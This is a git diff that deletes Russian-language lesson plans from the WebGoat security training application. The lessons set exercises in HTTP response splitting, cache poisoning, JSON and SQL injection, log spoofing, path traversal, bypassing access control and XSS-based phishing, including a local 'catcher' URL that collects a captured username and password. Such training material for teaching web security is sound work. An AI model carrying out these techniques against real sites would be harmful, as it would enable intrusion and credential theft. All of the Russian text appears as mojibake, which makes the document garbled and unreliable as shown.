-информацию на наличие Ñимволов CR (возврат коретки, обозначаетÑÑ Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ %0d или \r) и LF (перевод Ñтроки, обозначаетÑÑ
-Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ %0a или \n). Данные Ñимволы не только позволÑÑŽÑ‚ атакующему контролировать возвращаемые Ñервером заголовки и тело ответа,
-но и дают ему возможноÑть Ñоздавать поддельные ответы, Ñодержимое которых будет ему полноÑтью подконтрольно.
-
-
- Ðффект от таких атак может уÑиливатьÑÑ ÐºÐ¾Ð³Ð´Ð° они проводÑÑ‚ÑÑ Ð²Ð¼ÐµÑте Ñ Ð°Ñ‚Ð°ÐºÐ°Ð¼Ð¸ клаÑÑа "Отравление кеша" (Cache Poisoning).
-СмыÑл их в отравлении кеша жертвы по ÑредÑтвам подÑÐ¾Ð²Ñ‹Ð²Ð°Ð½Ð¸Ñ ÐµÐ¹ Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ HTTP Splitting поддельной Ñтраницы,
-пришедшей Ñкобы от Ñервера.
-
-
-ВмеÑте Ñ Ñтим, Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ уÑзвимоÑтей позволÑющих провеÑти разбиение HTTP-ответа, злоумышленник может заÑтавить Ñервер
-отоÑлать клиенту поддельный заголовок Last-Modified: Ñ Ð´Ð°Ñ‚Ð¾Ð¹ из будущего. От Ñтого браузер клиента Ñтанет поÑылать Ñерверу
-неверное Ñодержимое в заголовке If-Modified-Since . Сервер, в Ñвою очередь, вÑегда будет отвечать клиенту что (отравленнаÑ)
-Ñтраница не изменилаÑÑŒ и клиент поÑтоÑнно будет видеть Ñтраницу подÑунутую злоумышленником.
-
-
ПроÑтой пример ответа Ñ ÐºÐ¾Ð´Ð¾Ð¼ 304:
-
HTTP/1.1 304 Not Modified
-Date: Fri, 30 Dec 2005 17:32:47 GMT
-
-
-ОÑновные цели и задачи:
-
-Данный урок имеет две Ñтадии. Ðа первой вы изучаете проведение атак HTTP Splitting, а на второй научитеÑÑŒ Ñовмещать
-их Ñ Ð¾Ñ‚Ñ€Ð°Ð²Ð»ÐµÐ½Ð¸ÐµÐ¼ кеша.
-
-Введите любой Ñзык в форму поиÑка. ПоÑле отправки формы приложение оÑущеÑтвит переадреÑацию на другую ÑÑылку,
-раÑположенную на Ñтом же Ñервере. С помощью Ð¿Ð¾Ð¼ÐµÑ‰ÐµÐ½Ð¸Ñ CR (%0d) и LF (%0a) в название Ñзыка вы должны изучить проведение атак
-данного типа.
-Ваша цель ÑоÑтоит в том, чтоб заÑтавить Ñервер отправить ответ 200 ОК. ЕÑли Ñодержимое Ñкрана изменитÑÑ Ð¾Ñ‚ вашей атаки,
-проÑто перейдите на главную Ñтраницу. Как только шаг 2 будет выполнен уÑпешно вы увидите что в левом меню поÑвилаÑÑŒ новаÑ
-Ð·ÐµÐ»Ñ‘Ð½Ð°Ñ Ð¾Ñ‚Ð¼ÐµÑ‚ÐºÐ° на против Ñтого раздела.
-
-
-
diff --git a/src/main/webapp/lesson_plans/ru/InsecureLogin.html b/src/main/webapp/lesson_plans/ru/InsecureLogin.html
deleted file mode 100644
index 8340c9a06..000000000
--- a/src/main/webapp/lesson_plans/ru/InsecureLogin.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
Ðазвание урока: Insecure Login
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-ЧувÑÑ‚Ð²Ð¸Ñ‚ÐµÐ»ÑŒÐ½Ð°Ñ Ð¸Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ð¸Ñ Ð½Ð¸ÐºÐ¾Ð³Ð´Ð° не должна поÑылатьÑÑ Ð² виде открытого текÑта!
-Многие Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ ÑƒÑтанавливают защищённые ÑÐ¾ÐµÐ´Ð¸Ð½ÐµÐ½Ð¸Ñ Ñ‚Ð¾Ð»ÑŒÐºÐ¾ поÑле авторизиации.
-Ðто помогает хакерам, в том плане что они могут перехватить отправленные пользователем данные
-ещё до уÑтановки им безопаÑного ÑоединениÑ. Ð’ хороших веб-приложениÑÑ… Ð²Ð°Ð¶Ð½Ð°Ñ Ð¸Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ð¸Ñ
-никогда не передаётÑÑ Ð² открытом виде.
-ОÑновные цели и задачи:
-ПоÑмотрите как легко прочеÑть пароль передающийÑÑ Ð¾Ñ‚ÐºÑ€Ñ‹Ñ‚Ñ‹Ð¼ текÑтом. Так вы
-лучше поймёте преимущеÑтва передачи информации по защищённому Ñоединению.
-
diff --git a/src/main/webapp/lesson_plans/ru/JSONInjection.html b/src/main/webapp/lesson_plans/ru/JSONInjection.html
deleted file mode 100644
index 583c3fc85..000000000
--- a/src/main/webapp/lesson_plans/ru/JSONInjection.html
+++ /dev/null
@@ -1,25 +0,0 @@
-
-
Ðазвание урока: Выполнение атак клаÑÑа 'JSON-инъекциÑ'
-
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-Ðа данном уроке вы научитеÑÑŒ оÑущеÑтвлÑть атаки клаÑÑа 'JSON-инъекциÑ'
-
-
-
-Как работают такие атаки:
-
-JSON - Ñто проÑтой, "легковеÑный" и Ñффективный формат передачи данных. Данные,
-передаваемые Ñ ÐµÐ³Ð¾ помощью, могут иметь различные формы. Ðапример Ñто может быть маÑÑив, ÑпиÑок, хеш-таблица и Ñ‚.д.
-JSON обычно иÑпользуетÑÑ Ð² AJAX- и Web2.0-приложениÑÑ…, поÑтепенно вытеÑнÑÑ XML за Ñчёт Ñвоей проÑтоты и ÑкороÑти обработки.
-Ð’ то же Ð²Ñ€ÐµÐ¼Ñ JSON, как и XML, предраÑположен к атакам инъективного клаÑÑа. Ðапример злоумышленник может перехватить ответ
-Ñервера и внедрить в него произвольные данные.
-
-
-ОÑновные цели и задачи:
-
-* Ð’Ñ‹ летите из БоÑтона, Ñ Ð°Ñропорта Ñ ÐºÐ¾Ð´Ð¾Ð¼ BOS, в СиÑтл, в аÑропорт Ñ ÐºÐ¾Ð´Ð¾Ð¼ SEA.
-* Когда вы введёте трёхзначные коды аÑропортов, на Ñервер, ÑредÑтвами AJAX, уйдёт Ð·Ð°Ð¿Ñ€Ð¾Ñ Ð¾ цене билета.
-* Вам Ñообщат что еÑть два доÑтупных варианта - один без оÑтановок, а второй Ñ Ð´Ð²ÑƒÐ¼Ñ Ð¾Ñтановками.
-* Ваша задача попытатьÑÑ Ð·Ð°ÐºÐ°Ð·Ð°Ñ‚ÑŒ билет без оÑтановок за цену билета Ñ Ð´Ð²ÑƒÐ¼Ñ Ð¾Ñтановками.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/JavaScriptValidation.html b/src/main/webapp/lesson_plans/ru/JavaScriptValidation.html
deleted file mode 100644
index 20ac321ac..000000000
--- a/src/main/webapp/lesson_plans/ru/JavaScriptValidation.html
+++ /dev/null
@@ -1,22 +0,0 @@
-
-
Ðазвание урока: Обход валидации данных реализованной на клиентÑкой Ñтороне Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ JavaScript
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-Проверку данных, реализованную на клиентÑкой Ñтороне, не Ñтоит раÑÑматривать
-как какой-то механизм повышающий безопаÑноÑть приложениÑ. Она лишь призвана Ñократить
-количеÑтво неверных данных обрабатываемых Ñервером, которые могут поÑтупать от проÑтых
-пользователей не знающих правильный формат определённых полей. Ðтакующие могут
-легко обойти такие механизмы множеÑтвом ÑпоÑобов. ПоÑтому проверка вводимой информации на клиентÑкой Ñтороне
-обÑзательно должна иметь Ñвои аналог на Ñерверной чаÑти приложениÑ. Ðто Ñильно Ñнизит возможноÑть
-Ð¿Ð¾Ð¿Ð°Ð´Ð°Ð½Ð¸Ñ Ð² важные механизмы Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¾Ð¿Ð°Ñных данных.
-
-
-ОÑновные цели:
-Ðа Ñтом уроке веб-Ñайт проверÑет Ñодержимое формы Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ определённых механизмов.
-Ваша цель обойти их и отправить форму Ñ Ñ‚Ð°ÐºÐ¸Ð¼Ð¸ данными, которых Ñайт не ожидает.
-
-
-Ðа данном Ñайте реализована проверка поÑтупающих данных и на клиентÑкой, и на Ñерверной Ñтороне.
-Вашей задачей ÑвлÑетÑÑ Ð½Ð°Ñ€ÑƒÑˆÐµÐ½Ð¸Ðµ работы клиентÑкого механизма проверки и отправка Ñайту неожиданной
-Ð´Ð»Ñ Ð½ÐµÐ³Ð¾ информации. Ð’Ñ‹ должны нарушить работу вÑех 7 валидаторов.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/Lesson_Plan_Template.html b/src/main/webapp/lesson_plans/ru/Lesson_Plan_Template.html
deleted file mode 100644
index 66293a95c..000000000
--- a/src/main/webapp/lesson_plans/ru/Lesson_Plan_Template.html
+++ /dev/null
@@ -1,17 +0,0 @@
-
-
-Concept / Topic To Teach:
-Standards Addressed:
-General Goal(s):
-Specific Objectives:
-Required Materials:
-Anticipatory Set (Lead-In):
-Step-By-Step Procedures:
-Plan For Independent Practice:
-Closure (Reflect Anticipatory Set):
-Assessment Based On Objectives:
-Extensions (For Gifted Students):
-Possible Connections To Other Subjects:
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/LogSpoofing.html b/src/main/webapp/lesson_plans/ru/LogSpoofing.html
deleted file mode 100644
index 544b2bf23..000000000
--- a/src/main/webapp/lesson_plans/ru/LogSpoofing.html
+++ /dev/null
@@ -1,20 +0,0 @@
-
-
Ðазвание урока: Подделка запиÑей в лог-файлах.
-
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
- Ðа Ñтом уроке раÑÑматриваетÑÑ Ð¿Ñ€Ð¾Ñтой обман человечеÑких глаз.
-
-
-
-Как работает данный тип атак:
-Целью Ñтих атак ÑвлÑетÑÑ Ð¿Ð¾Ð´Ð´ÐµÐ»ÐºÐ° запиÑей лог-файла за Ñчёт Ð¿Ð¾Ð¼ÐµÑ‰ÐµÐ½Ð¸Ñ Ð² него Ñпециально Ñформированной Ñтроки.
-Ðто позволит атакующему запутать админиÑтратора и Ñкрыть Ñвои Ñледы.
-
-
-ОÑновные цели:
-
-* Ð’ Ñером поле, раÑположенном ниже, отображаетÑÑ Ñодержимое которое будет в неÑено в лог-файл.
-* Вашей целью ÑвлÑетÑÑ Ñоздание такой запиÑи, в которой Ñообщено будто пользователь "admin" вошёл уÑпешно
-* Кроме Ñтого попробуйте помеÑтить в лог-файл какую-нибудь JS-вÑтавку.
-
diff --git a/src/main/webapp/lesson_plans/ru/MultiLevelLogin1.html b/src/main/webapp/lesson_plans/ru/MultiLevelLogin1.html
deleted file mode 100644
index 464a1bac0..000000000
--- a/src/main/webapp/lesson_plans/ru/MultiLevelLogin1.html
+++ /dev/null
@@ -1,19 +0,0 @@
-
-
Ðазвание урока: ÐœÐ½Ð¾Ð³Ð¾ÑƒÑ€Ð¾Ð²Ð½ÐµÐ²Ð°Ñ Ð°Ð²Ñ‚Ð¾Ñ€Ð¸Ð·Ð°Ñ†Ð¸Ñ 1
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-ÐœÐ½Ð¾Ð³Ð¾ÑƒÑ€Ð¾Ð²Ð½ÐµÐ²Ð°Ñ Ð°Ð²Ñ‚Ð¾Ñ€Ð¸Ð·Ð°Ñ†Ð¸Ñ Ð¾Ð±ÐµÑпечиваетÑÑ Ð´Ð¾Ð±Ð°Ð²Ð»ÐµÐ½Ð¸Ð¼ дополнительного варианта
-проверки пользователÑ. Ðапример, поÑле того как вы зайдёте под Ñвоим именем и паролем, при
-Ñовершении важной операции приложение может попроÑить Ð²Ð°Ñ ÑƒÐºÐ°Ð·Ð°Ñ‚ÑŒ идентификационный номер транзакции (TAN).
-Обычно такие Ñхемы иÑпользуютÑÑ Ð² онлайн-банкинге. Банк даёт вам ÑпиÑок допуÑтимых
-номеров транзакций которые уникальны Ð´Ð»Ñ ÐºÐ°Ð¶Ð´Ð¾Ð³Ð¾ клиента. Один TAN может быть иÑпользован
-только один раз. Кроме того, TAN может отправлÑтьÑÑ ÐºÐ»Ð¸ÐµÐ½Ñ‚Ñƒ по SMS. Ð’ данном Ñлучае
-упор делаетÑÑ Ð½Ð° то, что злоумышленнику очень трудно узнать номера транзакций имеющиеÑÑ
-у пользователÑ.
-
-ОÑновные цели и задачи:
-Ð’ данном уроке вы должны иÑÑледовать похожую ÑиÑтема аутентификации.
-Из иÑходных данных у Ð²Ð°Ñ ÐµÑть Ð¸Ð¼Ñ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ, пароль и
-уже иÑпользованые TAN. Ð’Ñ‹ должны узнать принимает ли Ñервер номера транзакций Ñтавшие недейÑтвительными.
-
diff --git a/src/main/webapp/lesson_plans/ru/MultiLevelLogin2.html b/src/main/webapp/lesson_plans/ru/MultiLevelLogin2.html
deleted file mode 100644
index 7d77f76d9..000000000
--- a/src/main/webapp/lesson_plans/ru/MultiLevelLogin2.html
+++ /dev/null
@@ -1,17 +0,0 @@
-
-
Ðазвание урока: ÐœÐ½Ð¾Ð³Ð¾ÑƒÑ€Ð¾Ð²Ð½ÐµÐ²Ð°Ñ Ð°Ð²Ñ‚Ð¾Ñ€Ð¸Ð·Ð°Ñ†Ð¸Ñ 2
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-ÐœÐ½Ð¾Ð³Ð¾ÑƒÑ€Ð¾Ð²Ð½ÐµÐ²Ð°Ñ Ð°Ð²Ñ‚Ð¾Ñ€Ð¸Ð·Ð°Ñ†Ð¸Ñ Ð¾Ð±ÐµÑпечиваетÑÑ Ð´Ð¾Ð±Ð°Ð²Ð»ÐµÐ½Ð¸Ð¼ дополнительного варианта
-проверки пользователÑ. Ðапример, поÑле того как вы зайдёте под Ñвоим именем и паролем, при
-Ñовершении важной операции приложение может попроÑить Ð²Ð°Ñ ÑƒÐºÐ°Ð·Ð°Ñ‚ÑŒ идентификационный номер транзакции (TAN).
-Обычно такие Ñхемы иÑпользуютÑÑ Ð² онлайн-банкинге. Банк даёт вам ÑпиÑок допуÑтимых
-номеров транзакций которые уникальны Ð´Ð»Ñ ÐºÐ°Ð¶Ð´Ð¾Ð³Ð¾ клиента. Один TAN может быть иÑпользован
-только один раз. Кроме того, TAN может отправлÑтьÑÑ ÐºÐ»Ð¸ÐµÐ½Ñ‚Ñƒ по SMS. Ð’ данном Ñлучае
-упор делаетÑÑ Ð½Ð° то, что злоумышленнику очень трудно узнать номера транзакций имеющиеÑÑ
-у пользователÑ.
-ОÑновные цели и задачи:
-У Ð²Ð°Ñ ÑƒÐ¶Ðµ еÑть аккаунт Ð´Ð»Ñ ÑиÑтемы 'WebGoat Financial', но вам нужно
-войти под другим аккаунтом Ð·Ð½Ð°Ñ Ð»Ð¸ÑˆÑŒ его логин.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/NewLesson.html b/src/main/webapp/lesson_plans/ru/NewLesson.html
deleted file mode 100644
index 04197bd54..000000000
--- a/src/main/webapp/lesson_plans/ru/NewLesson.html
+++ /dev/null
@@ -1,13 +0,0 @@
-
-
-Создание уроков WebGoat
-
-ДобавлÑть уроки в WebGoat очень проÑто. ЕÑли у Ð²Ð°Ñ ÐµÑть Ñ…Ð¾Ñ€Ð¾ÑˆÐ°Ñ Ð¸Ð´ÐµÑ
-Ð´Ð»Ñ Ð½Ð¾Ð²Ð¾Ð³Ð¾ урока, Ñледуйте Ñтой проÑтой инÑтрукции чтоб реалиовать её:
-* Скачайте иÑходный код здеÑÑŒ.
-* УÑтановите фреймворк: Ñледуйте проÑтым инÑтрукциÑм в "HOW TO create the WebGoat workspace.txt" (данный файл поÑтавлÑетÑÑ Ð²Ð¼ÐµÑте Ñ WebGoat).
-* Вам необходимо добавить 2 файла Ñ Ñодержимым вашего урока:
- - YourLesson.java в org.owasp.webgoat.lessons
- - YourLesson.html в WebContent/lesson_plans
-
-
diff --git a/src/main/webapp/lesson_plans/ru/PasswordStrength.html b/src/main/webapp/lesson_plans/ru/PasswordStrength.html
deleted file mode 100644
index 4b0e5044a..000000000
--- a/src/main/webapp/lesson_plans/ru/PasswordStrength.html
+++ /dev/null
@@ -1,13 +0,0 @@
-
-
Ðазвание урока: СтойкоÑть паролÑ
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Ðккаунты защищены на Ñтолько, на Ñколько защищены их пароли. Многие пользователи
-везде ÑтремÑÑ‚ÑÑ Ð¸Ñпользовать Ñамые проÑтые варианты паролей. ЕÑли вы хотите защитить их от атаки методом проÑтого
-перебора (brute-force), вам Ñледует предъÑвлÑть к ним Ñерьёзные требованиÑ. ПользовательÑкий пароль обÑзательно должен Ñодержать
-как минимум буквы верхнего и нижнего региÑтров и цифры. Чем длиннее пароль, тем лучше.
-
-
-ОÑновные цели и задачи:
- Попробуйте проверить неÑколько иÑпользуемых вами паролей на ÑтойкоÑть вот на Ñтом ÑервиÑе - https://howsecureismypassword.net/
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/PathBasedAccessControl.html b/src/main/webapp/lesson_plans/ru/PathBasedAccessControl.html
deleted file mode 100644
index 7c69d6e1c..000000000
--- a/src/main/webapp/lesson_plans/ru/PathBasedAccessControl.html
+++ /dev/null
@@ -1,11 +0,0 @@
-
-
Ðазвание урока: Обход Ñхем ÐºÐ¾Ð½Ñ‚Ñ€Ð¾Ð»Ñ Ð´Ð¾Ñтупа оÑнованных на путÑÑ… файловой ÑиÑтемы.
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Ð’ Ñхемах ÐºÐ¾Ð½Ñ‚Ñ€Ð¾Ð»Ñ Ð´Ð¾Ñтупа оÑнованных на путÑÑ… файловой ÑиÑтемы атакующий может попытатьÑÑ Ð¿ÐµÑ€ÐµÐ´Ð°Ñ‚ÑŒ приложению
-отноÑительный путь, вмеÑто ожидаемых данных, Ð´Ð»Ñ Ð¾Ð±Ñ…Ð¾Ð´Ð° ограничений безопаÑноÑти. Следовательно, злоумышленник может
-получить доÑтуп к файлам, которые находÑÑ‚ÑÑ Ð²Ð½Ðµ текущей директории и к которым при нормальной работе Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¾Ð±Ñ€Ð°Ñ‰Ð°Ñ‚ÑŒÑÑ Ð½ÐµÐ»ÑŒÐ·Ñ.
-
-ОÑновные цели и задачи:
-Пользователь должен получить доÑтуп к файлу, находÑщемуÑÑ Ð²Ð½Ðµ текущей директории.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/Phishing.html b/src/main/webapp/lesson_plans/ru/Phishing.html
deleted file mode 100644
index a983d8e29..000000000
--- a/src/main/webapp/lesson_plans/ru/Phishing.html
+++ /dev/null
@@ -1,17 +0,0 @@
-
-
Ðазвание урока: Фишинг, оÑнованный на применении XSS
-
- Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Проверка вÑех принимаемых от пользователей данных вÑегда ÑчитаетÑÑ Ñ…Ð¾Ñ€Ð¾ÑˆÐµÐ¹ практикой.
-XSS-уÑзвимоÑти возникают в том Ñлучае, когда непроверенные пользовательÑкие данные
-возвращаютÑÑ ÐµÐ¼Ñƒ же в HTTP-ответе. С иÑпользованием XSS-уÑзвимоÑтей вы можете Ñовершать
-фишинг-атаки или же проÑто добавлÑть на уÑзвимую Ñтраницу какое-нибудь Ñтороннее Ñодержимое.
-Ð’ таких ÑитуациÑÑ… поÑетителÑм-жертвам очень трудно отделить наÑтоÑщую информацию на Ñайте от
-поддельной.
-
-ОÑновные цели и задачи:
-Пользователь должен каким-либо образом добавить на Ñтраницу форму
-запроÑа логина и паролÑ. При её отправке введённые данные должны уходить на адреÑ
-http://localhost/WebGoat/catcher?PROPERTY=yes &user=catchedUserName&password=catchedPasswordName
-
diff --git a/src/main/webapp/lesson_plans/ru/ReflectedXSS.html b/src/main/webapp/lesson_plans/ru/ReflectedXSS.html
deleted file mode 100644
index e41ac6e48..000000000
--- a/src/main/webapp/lesson_plans/ru/ReflectedXSS.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
Ðазвание урока: ИÑпользование отражённых XSS-уÑзвимоÑтей
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Ð’Ñегда хорошей практикой ÑчиталаÑÑŒ проверка вÑех входÑщих данных на Ñтороне Ñервера.
-XSS-уÑзвимоÑти могут возникать в тех ÑлучаÑÑ…, когда непроверенные пользовательÑкие
-данные Ñразу помещаютÑÑ Ð² HTTP-ответ. Ð’ таких ÑлучаÑÑ… нападающий может Ñформировать URL, Ñодержащий в Ñебе
-вредоноÑный код и передать его жертве(ам) через Ñторонний веб-Ñайт, почту или любым другим ÑпоÑобом.
-
-ОÑновные цели и задачи:
-Ð’ Ñтом упражнении вашей целью ÑвлÑетÑÑ Ð¾Ñ‚Ð¿Ñ€Ð°Ð²ÐºÐ° Ñерверу Ñпециально Ñформированного
-вредоноÑного ÑообщениÑ, которое, отобразившиÑÑŒ в ответной Ñтранице,оÑущеÑтвит
-какие-нибудь опаÑные дейÑÑ‚Ð²Ð¸Ñ (например выполнит произвольный JS-код).
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/RemoteAdminFlaw.html b/src/main/webapp/lesson_plans/ru/RemoteAdminFlaw.html
deleted file mode 100644
index 0b5a14085..000000000
--- a/src/main/webapp/lesson_plans/ru/RemoteAdminFlaw.html
+++ /dev/null
@@ -1,15 +0,0 @@
-
-
Ðазвание урока: ДоÑтуп к Ñкрытым реÑурÑам Ñайта
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-ÐŸÑ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¾Ñ‡ÐµÐ½ÑŒ чаÑто имеют админиÑтративные интерфейÑÑ‹ позволÑющие привилегированным пользователÑм
-получать доÑтуп к такому функционалу, к которому обычные пользователи не допуÑкаютÑÑ. Кроме того,
-Ñам Ñервер Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¼Ð¾Ð¶ÐµÑ‚ иметь админиÑтративный интерфейÑ.
-Стандартные адреÑа:
-ОÑновные цели и задачи:
-
-Попробуйте получить доÑтуп к админиÑтративному интерфейÑу WebGoat. Ð’Ñ‹ также можете попытатьÑÑ Ð¾Ð±Ñ€Ð°Ñ‚Ð¸Ñ‚ÑŒÑÑ Ðº админиÑтративному
-интерфейÑу Tomcat. РаÑполагаетÑÑ Ð¾Ð½ по адреÑу /admin. Обратите внимание на то что непоÑредÑтвенного Ð¾Ñ‚Ð½Ð¾ÑˆÐµÐ½Ð¸Ñ Ðº данному уроку
-он не имеет.
-
-
diff --git a/src/main/webapp/lesson_plans/ru/RoleBasedAccessControl.html b/src/main/webapp/lesson_plans/ru/RoleBasedAccessControl.html
deleted file mode 100644
index 98bff910f..000000000
--- a/src/main/webapp/lesson_plans/ru/RoleBasedAccessControl.html
+++ /dev/null
@@ -1,24 +0,0 @@
-
-
Ðазвание урока: Контроль доÑтупа оÑнованный на ролÑÑ…
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Ð’ Ñхемах оÑнованных на ролÑÑ… Ñама роль предÑтавлÑет из ÑÐµÐ±Ñ Ð½Ð°Ð±Ð¾Ñ€ разрешений доÑтупа и привилегий.
-Пользователю одновременно может быть приÑвоена одна или более ролей.
-Подобные Ñхемы чаще вÑего включают в ÑÐµÐ±Ñ Ð´Ð²Ð° механизма: механизм работы Ñ Ñ€Ð°Ð·Ñ€ÐµÑˆÐµÐ½Ð¸Ñми доÑтупа и
-механизм Ð½Ð°Ð·Ð½Ð°Ñ‡ÐµÐ½Ð¸Ñ Ð¿Ñ€Ð¸Ð²Ð¸Ð»ÐµÐ³Ð¸Ð¹. Ð’ ÑлучаÑÑ… когда Ñ€ÐµÐ°Ð»Ð¸Ð·Ð°Ñ†Ð¸Ñ Ð´Ð°Ð½Ð½Ð¾Ð¹ Ñхемы имеет какие-то изъÑны пользователь может получить
-доÑтуп к функционалу, к которому ему обращатьÑÑ Ð½Ðµ разрешено. Или он может каким-либо образом повыÑить Ñвои
-привилегии в приложении.
-
-
-ОÑновные цели и задачи:
-Ваша цель ÑоÑтоит в изучении правил ÐºÐ¾Ð½Ñ‚Ñ€Ð¾Ð»Ñ Ð´Ð¾Ñтупа данного Ñайта.
-ÐšÐ°Ð¶Ð´Ð°Ñ Ñ€Ð¾Ð»ÑŒ имеет Ñ€Ð°Ð·Ñ€ÐµÑˆÐµÐ½Ð¸Ñ Ð½Ð° доÑтуп к определённому реÑурÑу (A-F). Каждому пользователю приÑвоена одна или более ролей.
-Только пользователи имеющие роль [Admin] могу получать доÑтуп к F-реÑурÑам. Ð’ Ñлучае удачного Ð¿Ñ€Ð¾Ð²ÐµÐ´ÐµÐ½Ð¸Ñ Ð°Ñ‚Ð°ÐºÐ¸
-пользователь не имеющий роль [Admin] должен получить доÑтуп к F-реÑурÑам.
-Учебные реÑурÑÑ‹:
-Схема организации
-
-Матрица ÐºÐ¾Ð½Ñ‚Ñ€Ð¾Ð»Ñ Ð´Ð¾Ñтупа
-
-Структура базы данных
diff --git a/src/main/webapp/lesson_plans/ru/SQLInjection.html b/src/main/webapp/lesson_plans/ru/SQLInjection.html
deleted file mode 100644
index 2078691e9..000000000
--- a/src/main/webapp/lesson_plans/ru/SQLInjection.html
+++ /dev/null
@@ -1,20 +0,0 @@
-
-
Ðазвание урока: Проведение SQL-инъекци
-
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-SQL-инъекции предÑтавлÑÑŽÑ‚ из ÑÐµÐ±Ñ Ð¾Ñ‡ÐµÐ½ÑŒ Ñерьёзную угрозу Ð´Ð»Ñ Ñайтов оÑнованных на БД.
-Методы их иÑÐ¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ð½Ð¸Ñ Ð´Ð¾Ñтаточно легки в оÑвоении, а ущерб Ñоздаваемый ими огромен и
-при определённых уÑловиÑÑ… может произойти к компрометации вÑей ÑиÑтемы. Тем не менее,
-количеÑтво интернет-Ñайтов Ñ ÑƒÑзвимоÑÑ‚Ñми данного типа поÑтоÑнно раÑтёт.
-
-Ðа Ñамом деле вÑегда можно избежать поÑÐ²Ð»ÐµÐ½Ð¸Ñ ÑƒÑзвимоÑтей Ñтого клаÑÑа
-еÑли в процеÑÑе напиÑÐ°Ð½Ð¸Ñ Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ð¹ Ñоблюдать общие меры предоÑторожноÑти.
-Ðапример фильтровать вÑе поÑтупающие от Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð´Ð°Ð½Ð½Ñ‹Ðµ. ОÑобенно те, которые
-будут помещены в SQL-запроÑÑ‹.
-
-ОÑновные цели и задачи:
-Ð’ данном упражнении вы научитеÑÑŒ иÑпользовать SQL-инъекции. Кроме того, вам нужно будет
-внеÑти в код правки, которые уÑтранÑÑ‚ Ñту уÑзвимоÑть в теÑтовом приложении.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/SameOriginPolicyProtection.html b/src/main/webapp/lesson_plans/ru/SameOriginPolicyProtection.html
deleted file mode 100644
index c7433453d..000000000
--- a/src/main/webapp/lesson_plans/ru/SameOriginPolicyProtection.html
+++ /dev/null
@@ -1,13 +0,0 @@
-
-
Ðазвание урока: Защита Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ политики одного иÑточника (Same Origin Policy)
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Ключевым Ñлементом технологии AJAX ÑвлÑетÑÑ ÐºÐ¾Ð¼Ð¿Ð¾Ð½ÐµÐ½Ñ‚ XMLHttpRequest (XHR). Он позволÑет Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ JavaScript
-отправлÑть запроÑÑ‹ на Ñторону Ñервера в аÑинхронном режиме. Из Ñоображений безопаÑноÑти Ð·Ð°Ð¿Ñ€Ð¾Ñ Ð¼Ð¾Ð¶Ð½Ð¾ отправить
-только на тот домен, Ñ ÐºÐ¾Ñ‚Ð¾Ñ€Ð¾Ð³Ð¾ загружена Ñ‚ÐµÐºÑƒÑ‰Ð°Ñ Ñтраница.
-
-ОÑновные цели и задачи:
-Упражнение демонÑтрирует механизмы защиты обеÑпеченные политикой одного иÑточника (Same Origin Policy)
